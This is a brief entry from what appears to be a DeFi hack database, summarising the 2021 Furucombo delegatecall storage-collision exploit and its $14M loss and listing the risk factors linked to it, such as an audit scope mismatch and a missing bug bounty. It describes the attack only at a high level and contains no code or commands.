Furucombo: Evil Contract — Delegatecall Storage Collision
An attacker exploited Furucombo's delegatecall architecture to overwrite its proxy's implementation slot with a malicious contract, draining $14M from users who had granted unlimited token approvals.
Summary #
Furucombo suffered a DeFi Aggregator / Transaction Composer on 2021-02-27, resulting in a loss of approximately $14M.
What happened #
An attacker exploited Furucombo's delegatecall architecture to overwrite its proxy's implementation slot with a malicious contract, draining $14M from users who had granted unlimited token approvals.
Linked factors #
- RD-F-001 — causal : ★ Direct: Audit scope mismatch (report commit ≠ deployed bytecode) [via cross-hack: Factor 1: Audit Scope Mismatch]
- RD-F-007 — causal : Direct: bug bounty presence + max payout [via cross-hack: Factor 9: No Bug Bounty Program] || Bug bounty absent — baseline integrity gap [via dashboard_risk_factors/Bug bounty: Unknown]
- RD-F-012 — causal : delegatecall with user-controlled target [via cross-hack: Factor 22: Delegatecall-to-Proxy in Handler Registry]
- RD-F-039 — related : ★ delegatecall in proposal execution path [via cross-hack: Factor 22: Delegatecall-to-Proxy in Handler Registry]